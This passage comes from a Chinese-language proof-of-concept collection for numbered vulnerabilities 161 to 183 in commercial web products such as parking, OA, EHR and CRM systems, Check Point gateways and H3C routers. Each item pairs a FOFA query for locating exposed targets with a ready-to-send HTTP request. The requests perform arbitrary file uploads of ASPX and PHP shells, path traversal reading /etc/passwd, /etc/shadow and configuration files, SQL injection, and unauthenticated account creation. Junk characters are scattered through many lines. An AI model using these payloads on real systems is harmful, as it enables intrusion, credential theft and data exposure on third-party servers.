Accept-Language: en
6 o$ s% v8 Q, FAccept-Encoding: gzip: R8 m0 C. k' z( k3 m$ }: T' ^

* @# a& Z' I, J2 u$ c
6 H. A" o+ O4 X5 j9 L161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传6 e3 j5 J' u5 v) ^) Y7 r% V
FOFA:body="/KT_Css/qd_defaul.css"
7 i2 s* @. q  V! ^' O, m4 @第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密* m- \' C; {! r- K
POST /Webservice.asmx HTTP/1.1! I! D1 J" F  p. D$ F
Host: x.x.x.x
2 F  e4 l0 \0 u8 D; ?. j' yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36, `) U% M6 i" h4 |) S7 @9 {4 M1 ~% }
Connection: close) ^8 Z3 d' B. z: j7 m# [
Content-Length: 445
9 J4 X# V7 D( u) ^0 F9 }  WContent-Type: text/xml9 A( K) L- {3 i- \2 ~
Accept-Encoding: gzip
' v- ?+ H' q6 _( T1 o9 B# j) h/ n% p2 W6 w# _5 w  B
<?xml version="1.0" encoding="utf-8"?>
8 k$ Q  M, v. k1 b<soap:Envelope xmlns:xsi="
$ i  [7 c9 A: z8 R# f: hhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
' i) F* b/ m3 s3 U- ?xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
- R& T+ B) Q, t) `8 U3 ?8 `<soap:Body>6 R8 w0 ~( f* K5 j; a
<UploadResume xmlns="http://tempuri.org/">% w, g0 B2 e( n- Y; t$ T
<ip>1</ip>0 t' w0 ?3 W) _# [5 [  z" Q
<fileName>../../../../dizxdell.aspx</fileName>+ f9 P- F2 a) l4 |, m: L& I
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>7 |8 \: ~* J# l4 N6 l* b/ B
<tag>3</tag>
* i5 n' h- S  r7 h4 d! k; D</UploadResume>+ x# B4 p- D8 O  w
</soap:Body>
+ @! }. f# u! z3 v: ]" i. Y' u</soap:Envelope>
! O; I0 d$ k: H, k% z0 n$ V! A
- c) F' n/ x) P& j5 I
; C. A$ `! g7 D8 u2 \# Ahttp://x.x.x.x/dizxdell.aspx
+ r) l; _- R' _6 F4 W/ T6 @; E  I8 A/ N8 z! j
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
, M2 b4 s' P# RFOFA: app="和丰山海-数字标牌") o3 ]3 q) g7 d& c- p
POST /QH.aspx HTTP/1.1+ l. J: c. U9 Z7 G# S
Host: x.x.x.x( ^/ q7 C+ c- ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0& K4 o, n3 E5 r( e1 i9 b3 a
Connection: close* a& w, F5 [% J) L$ D& u$ Q
Content-Length: 5837 j" r" @/ B3 H$ ?" g( x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
, v, `2 n# Z& pAccept-Encoding: gzip
2 A8 `" l, U6 t# l* ?
, t, M8 W3 ]! P$ U+ h------WebKitFormBoundaryeegvclmyurlotuey
2 n+ X  X& F0 s1 m# ZContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
3 k9 s" L3 E5 `. D: g5 E, ]Content-Type: application/octet-stream
! E% o* a0 R& {, c$ H
( t. c1 r5 ?2 x( ~8 e5 a0 R3 _' z3 [<% response.write("ujidwqfuuqjalgkvrpqy") %>
7 o( U0 x: ]2 m% h# l8 C) M+ G------WebKitFormBoundaryeegvclmyurlotuey# V5 x1 q, I9 b, h
Content-Disposition: form-data; name="action"
6 F; ?6 p( @3 D. @$ ]/ n
0 @8 T: l: k% T8 C: S/ Z$ bupload9 V! b; \' Z6 k) x; G( E
------WebKitFormBoundaryeegvclmyurlotuey) l" a; U; W" A$ a' E
Content-Disposition: form-data; name="responderId"
$ A+ J6 V  L8 e+ p! ?6 m/ z8 L! j' Z) v1 c' U$ J
ResourceNewResponder
* d7 o" J7 o5 p8 x0 ~% b7 M------WebKitFormBoundaryeegvclmyurlotuey5 E& V; [& d% y4 B2 Y/ ?
Content-Disposition: form-data; name="remotePath"0 s! K5 l. v* ?
  I6 q4 e" v" t. V9 N
/opt/resources
9 u# L% e' E/ w- z------WebKitFormBoundaryeegvclmyurlotuey--
6 ]3 O( F- l* m! q  D0 G5 h
( t. T7 |( m' ^8 H3 i
0 U3 u+ h6 L* Y8 s( Rhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx$ j5 z3 E9 Z, G$ o

5 `" @! i' m6 d- e! B, f7 S163. 号卡极团分销管理系统 ue_serve.php 任意文件上传0 w' z8 o, R8 M' v4 ^6 o2 h
FOFA: icon_hash="-795291075") S* P- y' x' R, w$ Q" A) }8 Q9 I
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
- u& \3 @( P, x! H: k% SHost: x.x.x.x3 ^5 `0 z$ m8 Z: e- n3 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.361 j! ?7 u6 l; H0 g; e! b
Connection: close
; L. K) \1 a3 }% ?& m$ \Content-Length: 293
; K0 L& J$ S. R# y, {) _Accept: */*" \& F9 T0 j& E" Z8 F' P4 T4 t) H
Accept-Encoding: gzip, deflate1 A( L, B6 c/ M
Accept-Language: zh-CN,zh;q=0.91 [& M+ |& \/ `
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod6 T  S; p; ~, t. ]) v. [- B
0 U3 a9 I* ~  I
------iiqvnofupvhdyrcoqyuujyetjvqgocod
" }7 s. I  |3 A9 @3 \Content-Disposition: form-data; name="name"+ V* W) j2 ?7 O. }* y  u+ L, ^$ C& S

3 L5 W! [: W4 Y. K7 U. q1.php
0 N. r# W) ]' _1 S( N------iiqvnofupvhdyrcoqyuujyetjvqgocod
; l" y. W6 @$ z; N; l. A; p. AContent-Disposition: form-data; name="upfile"; filename="1.php"- \% q# H+ A# Y% Y% T2 S1 B! P
Content-Type: image/jpeg/ }9 G/ X  y' n1 V

5 k; \, [4 d" e; mrvjhvbhwwuooyiioxega
, b- x3 W; O* F. E------iiqvnofupvhdyrcoqyuujyetjvqgocod--2 c1 C( v% o# K) C2 q

6 Z+ m$ k$ L& s3 s& Z2 f% z
0 k, E- O- T4 Q& @; `# \164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传6 _% O; X' X3 ~: M4 M# G
FOFA: title="智慧综合管理平台登入"
3 @3 k8 v( N/ KPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1( r7 t4 R' n) K5 F  |5 q
Host: x.x.x.x
; @2 f) f2 \+ J9 U: V& a, eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0* b2 l$ d, A1 F" G
Content-Length: 2882 ?) `. w* q' ^6 Q* o8 P
Accept: application/json, text/javascript, */*; q=0.01
- R4 E4 i! }5 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
8 J! ^6 w. q! }# C  JConnection: close
' [  s8 B1 c& eContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl4 G4 X2 v8 _9 ~& C1 }
X-Requested-With: XMLHttpRequest
3 f4 L- X: M3 J3 ]1 ^5 {Accept-Encoding: gzip4 g9 S2 r0 i/ K1 P/ p, d; v

8 _3 R7 J% P0 @/ _; T8 C% j------dqdaieopnozbkapjacdbdthlvtlyl
2 m! I: }' M3 E, B+ x; |( z" NContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
! I' d5 A3 W9 h7 m# ]Content-Type: image/jpeg7 Q& H) G4 [$ C0 w4 I

) y( ?  L+ d/ w( a' Y, w  a- S- T<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>4 s5 |7 l0 C( o4 R" U0 f; p9 k3 J
------dqdaieopnozbkapjacdbdthlvtlyl--1 N, ?: [' C7 b" S* |

& l+ J! U6 P( q) z, N  A) t$ A: d5 F. X% h) M3 E; T
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx0 n7 _) A9 J2 x3 Q+ n6 d5 R

4 Y9 @( U& n& {) r) h% X0 B. r& u& K165. OrangeHRM 3.3.3 SQL 注入( G- d* V; U& p4 ?0 M
CVE-2024-36428
" e; c( l/ q& N3 P7 c/ e8 MFOFA: app="OrangeHRM-产品"
: R6 F' \+ q: i$ m: wURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
- }0 D# y5 N* k2 k, M$ C0 G  \5 N6 s
+ Y- f2 F: P4 X; ]
- Y: C4 d, v! u' n. @0 y+ J! n166. 中成科信票务管理平台SeatMapHandler SQL注入# B- c- }' s8 O! [/ ?2 H/ Q+ S
FOFA:body="技术支持:北京中成科信科技发展有限公司", e4 j% e, p3 b0 T
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1' F3 X: S6 \+ V9 ]/ S$ U
Host:
( o/ S8 |; [9 U2 |: A( ^9 DPragma: no-cache
1 \: t5 F* t5 q! V7 y6 r9 kCache-Control: no-cache
$ s3 q, e. V8 [+ n6 I4 _: ~" mUpgrade-Insecure-Requests: 1" Z% \6 d; a: Z: }& U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
& P( B; f7 a. [, v% fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( u4 P) J8 Y. u( N# `9 f9 k0 O7 B
Accept-Encoding: gzip, deflate- P% o, X/ d8 B2 ~% W' I: y0 J' ~
Accept-Language: zh-CN,zh;q=0.9,en;q=0.88 p! |8 \7 y+ H  j" q; y9 J1 p
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE! Y9 G! o7 ]/ Q! p0 i! z+ \& m
Connection: close
; a5 Q4 D3 ?. i, x% U2 W  Y0 CContent-Type: application/x-www-form-urlencoded0 l% h: O! ?9 }' I7 L
Content-Length: 89$ W7 j  B7 o) I5 }9 |1 H

# V8 V& {/ O* i# X( |! eMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE( i( t8 ^4 Q) C$ B3 c  p7 d

: T+ C9 Q; J8 D
. `. r2 I' F2 c$ W# ?167. 精益价值管理系统 DownLoad.aspx任意文件读取
2 ?5 f  u* y/ k8 m$ O4 }2 _FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
+ M& T* V  f3 k  N4 kGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
3 i1 I( l* \& e2 y& }  SHost:  a( z, n  z: G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# y6 ?; w: m. O3 w8 zContent-Type: application/x-www-form-urlencoded
$ f; x4 ]( m/ B& C& H& m* ~. IAccept-Encoding: gzip, deflate
6 c# m5 ^, \& fAccept: */*
+ L$ ^1 T5 a+ n) S1 Q+ S. p7 f7 JConnection: keep-alive
6 x8 _( |- R* [
9 ^& f+ P, Q& f% ~5 R/ g) r
( b) i0 R. E9 j! D168. 宏景EHR OutputCode 任意文件读取! [: M8 H0 v2 X& E+ Q- {% E
FOFA:app="HJSOFT-HCM"9 n8 W' P. Z7 W7 ~& X
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.19 l( a1 k4 ^& z2 n9 {
Host: your-ip. o0 i& V+ h* Q* J! h) d; `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36/ [: B2 `; k( R; G/ }; m& M
Content-Type: application/x-www-form-urlencoded
' [5 u9 }: C, |6 N6 P8 q, G7 DConnection: close' b! @$ T  g& p8 x7 ?* G  X( T: L( h
$ x7 k" O6 e" I) F6 D; ]9 m1 v0 f

7 L: Y" M6 q7 h: m: `- ]( g# Y# |7 T; X2 L7 R) `
169. 宏景EHR downlawbase SQL注入
0 y0 `  E7 U2 w/ e9 K) n9 _% eFOFA:app="HJSOFT-HCM"8 p' b9 _2 Y1 ~' A1 d
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
7 l+ B& }; u% F6 n" LHost: your-ip
8 l1 N( y$ s* JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ G5 z& W! M3 Z" {
Accept: */*& n3 Q  q4 _" m1 d7 C9 ^
Accept-Encoding: gzip, deflate
/ s/ q' D. m% j$ g2 N# GConnection: close0 h1 e/ n3 X, N/ {  ?

, I0 }( \( @% M! v0 L+ m% {1 [! I8 o: d. J
7 l3 K0 j/ ], f4 Q
170. 宏景EHR DisplayExcelCustomReport 任意文件读取. N9 O1 Y) Y# j6 H  Z( {7 K
FOFA:body="/general/sys/hjaxmanage.js", n1 d7 ~  {3 }. {
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1# p* |/ o$ ^0 i0 q& R( p% G! j
Host: balalanengliang
9 _0 r8 Y" o! K; MUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- f* \/ E5 s  V3 vContent-Type: application/x-www-form-urlencoded1 U5 x: x; O4 t7 x2 W. t3 t+ H) M. ?

# d6 w$ F4 J! T! N& kfilename=../webapps/ROOT/WEB-INF/web.xml! J$ ~5 |, Y( f! V& x
+ G1 y7 J3 ?6 c4 s
' Z0 x+ e& H/ @; G
171. 通天星CMSV6车载定位监控平台 SQL注入" b# }3 |0 h4 F% z
FOFA:body="/808gps/"
7 r* N1 D6 Z+ ^' y* mGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
' m7 k0 _, }" r4 {: o1 ZHost: your-ip
( o+ v" ?; T4 b0 D" a' C) k3 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0, M& r! I. D' @: m
Accept: */*- h: d& ^9 I4 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( O4 s5 B; X- M0 {' J
Accept-Encoding: gzip, deflate! H, a* F& @9 X' u% m
Connection: close% ]% V0 R4 D0 I" W5 Z

& I, U2 Q$ \, b! X* D1 b0 W) D8 Y9 z# ]9 ~: c5 q

. v, G3 M( t: \# l  n1 [172. DT-高清车牌识别摄像机任意文件读取
+ ?$ Q1 e3 @; l, v( M( ^FOFA:app="DT-高清车牌识别摄像机"- k8 F* d1 G- {! p5 ^, q
GET /../../../../etc/passwd HTTP/1.1
$ m. a, X6 C& a9 _Host: your-ip4 b7 N$ q& M: O/ _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 t: ?2 w, `; d7 Q% ZAccept-Encoding: gzip, deflate# W6 u5 Z. y$ t! P( ^
Accept: */*
/ E& H& I* G. ?4 a4 q* DConnection: keep-alive7 s+ {, l- S3 ]" v7 B! i
# ~( }& ^* K* M4 G5 g
+ e0 X: r4 G" e+ Y9 Q1 I$ P
' r, m  N: _: E3 q! C, a5 B. }
173. Check Point 安全网关任意文件读取" J7 T( `0 M+ M/ ], Z
CVE-2024-24919& i( m! u$ ?6 p* m  s, t; D
FOFA:app="Check_Point-SSL-Network-Extender"
9 B3 S$ y( [8 @" KPOST /clients/MyCRL HTTP/1.12 O/ Z3 r- d/ Z
Host: your-ip, t; |, d0 G6 Q' ~/ b/ B4 V; n9 J
Content-Type: application/x-www-form-urlencoded
) Y7 v+ @3 M: l* c7 l$ ~! F
; i% t. q% o# p9 C$ |- |aCSHELL/../../../../../../../etc/shadow
6 s- I. V# A+ c; k
& W$ L) o8 Z; I7 k9 t! ]/ F$ y8 ?( ]) K) M, Y
4 g8 `' C3 g6 b- r/ A
174. 金和OA C6 FileDownLoad.aspx 任意文件读取; O- E( m7 N. W4 H6 v! _
FOFA:app="金和网络-金和OA"
# u- V$ |0 Z3 U6 @1 n0 GGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
! A0 X/ Y+ o" ~! ~Host: your-ip
" |& s) K. A! M2 Y  R9 N$ ^; kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. i6 E+ q0 L. DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: e( _1 z3 M5 G! S- [Accept-Encoding: gzip, deflate, br
* T) O- [# o  V8 ]Accept-Language: zh-CN,zh;q=0.9! @8 R( S1 B' K6 _% U. Z
Connection: close
$ m+ x" m6 |/ J" c2 h
8 m" G- W* v& J, n7 g5 Z! `; O
+ l) E8 H( `! |( Q& Y% O/ F
4 w! t8 r4 F. G' M1 {( p175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
5 {( F+ W0 k! i0 Q( U' V6 hFOFA:app="金和网络-金和OA"
( J7 d' u( Q1 J. q2 oGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
( Y2 k5 a, Z) x1 ~& l# z9 ZHost:; \; h* d) k/ p6 y2 N3 L
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" m: @) k8 p1 M& N; JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! H# k) H$ d; JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. l9 k* c) w% @" n. i( PAccept-Encoding: gzip, deflate
3 U( K$ |8 _# R& ?0 S+ WConnection: close
0 n& ?7 @0 J" CUpgrade-Insecure-Requests: 1
/ Q, g. U' S) Z! _
- @$ ~9 J% ?' y- ]& K% }
3 M  H/ D9 t& z. a& a176. 电信网关配置管理系统 rewrite.php 文件上传
( G& ~! K) {# b: v4 bFOFA:body="img/login_bg3.png" && body="系统登录"1 c9 m& W# v8 D. d
POST /manager/teletext/material/rewrite.php HTTP/1.1, |/ N/ T" K! s6 J; @& K" z
Host: your-ip6 R8 C0 \, I$ r0 a- x& W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0: e9 a) A; u9 a6 F0 t( N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
# z4 s7 \2 O& f3 VConnection: close
) a& T$ B& ]+ n$ \( `2 \; c5 g3 \6 A% `1 x# @3 e, S' K
------WebKitFormBoundaryOKldnDPT
. ~& L6 l: e  ?Content-Disposition: form-data; name="tmp_name"; filename="test.php"
: U5 k! f' g* Z& N7 f1 p. X/ ?) ]Content-Type: image/png$ j4 X/ v+ O+ H8 S# Q  M) f

4 f; K5 O6 j! R! k9 }5 F" p2 q, G<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 q( y# ]( L3 |* ]! r! o------WebKitFormBoundaryOKldnDPT
( k  U1 O3 X% q. }; hContent-Disposition: form-data; name="uploadtime"
& U: C1 s5 U2 R0 M # }6 {" L7 o! V1 ?
4 m; C8 Y& n; w) _+ Y. V4 l
------WebKitFormBoundaryOKldnDPT--7 ~# d3 u" Y0 H" A' x+ U  [# r0 r

8 G1 j% @1 w3 |  a" o( @* k" G7 T& h7 `# P5 f, [' Z

5 ~7 Y$ \- \) f0 D) q) G177. H3C路由器敏感信息泄露7 I( [6 @  l7 ~  v, f
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg" R- k# g- V0 I+ ^
/userLogin.asp/../actionpolicy_status/../M60.cfg
' l8 w0 P' L  {- I9 I/userLogin.asp/../actionpolicy_status/../GR8300.cfg/ }* @# F' z' e- @( I5 W5 l9 D
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
  \( i8 U4 @. g) ]' z4 s/userLogin.asp/../actionpolicy_status/../GR3200.cfg
! m8 e3 F  S8 k+ B/userLogin.asp/../actionpolicy_status/../GR2200.cfg
1 L) @/ w" O$ F2 Q/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
! o5 C! W8 H; X2 R" ]6 B/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
" o, A1 R) t6 T7 \; l# ?: I/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg6 T8 D5 `/ h) u+ [5 G  z
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg/ |) j% E# G1 b7 M1 ?  A( C
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
; N& Z- p( b$ Y4 R. V" I/userLogin.asp/../actionpolicy_status/../ER5100.cfg: ~: p, k% M: n
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg( k) \$ x( _8 p! Z2 U
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
6 j8 Z) V; e/ E8 a! I/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
, C7 l* K2 o3 @/userLogin.asp/../actionpolicy_status/../ER3200.cfg
0 }$ F! v! u% O/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
; Z( t6 K, ^4 J8 E3 Z/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
1 K5 [8 C2 e! R4 ?) R" z$ E/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
+ b8 x+ M) i. I1 ?/userLogin.asp/../actionpolicy_status/../ER3100.cfg% J5 y7 \3 s' J
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg6 n2 L6 P( I4 T1 a' F1 {8 l+ G! d2 H- F

" ?! [, F1 O& h
( n$ n6 D( Z4 j% H% C178. H3C校园网自助服务系统-flexfileupload-任意文件上传# o) _7 q, z2 A8 V# X" Z- |
FOFA:header="/selfservice"
% |1 H: z" w2 S2 g4 E% }POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
6 H* M, i2 p* J3 f+ aHost:8 G1 k( ~3 m* d/ f! U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 c/ H: G' X% ]8 b5 o4 d
Content-Length: 252- I$ ]# E2 Z2 e( i
Accept-Encoding: gzip, deflate9 d5 \0 }% y! ]9 ]3 t# ^3 Y
Connection: close3 b3 p* @$ [# u4 k. u* F; d
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
. G# L5 H4 J2 Q) u-----------------aqutkea7vvanpqy3rh2l
$ w8 O( [/ Q/ }) H: A: PContent-Disposition: form-data; name="12234.txt"; filename="12234"5 j; q0 R3 x" Q; e/ x
Content-Type: application/octet-stream
1 G# u( H5 u; vContent-Length: 255
9 d: a3 l0 m' k8 p: b$ L& `
3 G2 C( [7 ?: u- l12234; g3 _+ {/ j$ _; j
-----------------aqutkea7vvanpqy3rh2l--
" g8 W* Z* Z1 V4 p( g
* H- ]) `6 L+ Y
* a# ^( n+ G+ B  g# c9 E! DGET /imc/primepush/%2e%2e/flex/12234.txt
9 [% V  V+ U; {. o- m) @
! A' k; C0 B- e0 G9 M1 M' j1 r  e. h. N" ]# P/ q; J! f  Z
179. 建文工程管理系统存在任意文件读取
" ~$ ]) T) Z; d! a. {POST /Common/DownLoad2.aspx HTTP/1.1
0 F  K3 n) f3 @) P0 K9 v! uHost: {{Hostname}}
% t+ z7 m$ q( B3 z* oContent-Type: application/x-www-form-urlencoded
! `/ y0 d# v& d$ CUser-Agent: Mozilla/5.0( o% D/ {/ A  l$ L! W1 k
4 E/ B9 r1 G5 g6 i
path=../log4net.config&Name=
2 E. l) w3 d4 {; n
' }6 |+ X  b6 d" k8 F& z5 {. J: q# {3 X
1 N, P1 M! n# o' ~* M# J! v180. 帮管客 CRM jiliyu SQL注入! p* D( Y4 `* `% D/ k+ Q- r
FOFA:app="帮管客-CRM"5 C- x+ O5 o  n# z! Z" C, I: K  U
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1+ ]! B% G2 R: _) L
Host: your-ip
  \6 p  K; k. e! r' B; yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 d- M2 |* P3 }1 \: r7 {2 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 e& r! b2 ?% h+ P% G1 I  c! k! GAccept-Encoding: gzip, deflate
/ @: ~8 }/ u: `8 `9 s5 SAccept-Language: zh-CN,zh;q=0.9
1 s. R' l% d( q& _7 f( y7 L( l4 JConnection: close1 h% z. m0 v5 |6 `; Z" [
4 E2 B$ O+ M8 c2 T

. l7 R- H3 u% j) p/ L  n2 o  \181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; J) _: N+ ~' a' o- i
FOFA:"PDCA/js/_publicCom.js". P6 D0 l* Y0 i0 N8 Y
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.18 |% E5 v# s$ m
Host: your-ip
3 s2 m' J, c# r; @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
  M7 W2 F$ _$ w% p+ @1 Q! X& i. KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. z6 A. T4 C4 l- y8 w1 i
Accept-Encoding: gzip, deflate, br' q, \* c. n6 p* d6 U) M% S4 G
Accept-Language: zh-CN,zh;q=0.9# X3 k& |. c/ i/ m1 F" v
Connection: close$ j- D! f! M; e" q1 i6 g  Q
Content-Type: application/x-www-form-urlencoded
3 }  c& a  A) L6 A
$ i& N$ D! w- T% U- U- ]/ i" Y( a1 c: Q7 a) H/ b9 {# E
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
6 h( O0 i  m" X/ x% u
7 Q; r. Y4 A* r8 p9 [; u. r+ K7 W* g
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
, U6 s; k9 i5 M- A1 C! dFOFA:"PDCA/js/_publicCom.js"2 t( N9 O% ^& ~$ w) `5 \
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
/ r8 @1 D8 y9 E1 v: G8 i( R' @Host: your-ip
5 d1 P5 y" p: d* \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 a7 C# r9 z+ r! GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* q& y3 H, d- T; h
Accept-Encoding: gzip, deflate, br. i; d# n7 y. {0 a) P
Accept-Language: zh-CN,zh;q=0.9
  q/ h5 ~. R( LConnection: close) v0 `8 \( x+ E' ]; ]3 o& J" V1 \
Content-Type: application/x-www-form-urlencoded
3 B/ J7 h5 z( S3 G
, p9 M# c# M2 Q+ Y$ n& |
3 @5 r: @  T7 |: Nusername=test1234&pwd=test1234&savedays=1
7 j( R8 U' b8 t, E) i* ^, C0 ^% D$ |& `: z. y  z' ~$ x5 i5 k

# v+ q" q" j+ H# q" _5 n183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 ?. U% A3 s7 h# k% g/ `FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"( ~1 z: }, E. g, V! {6 F
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1+ f6 h/ G( m9 D  t, y) ^: G$ x
Host: your-ip
9 v+ ]/ e" R, C2 N. {: m& O- |User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
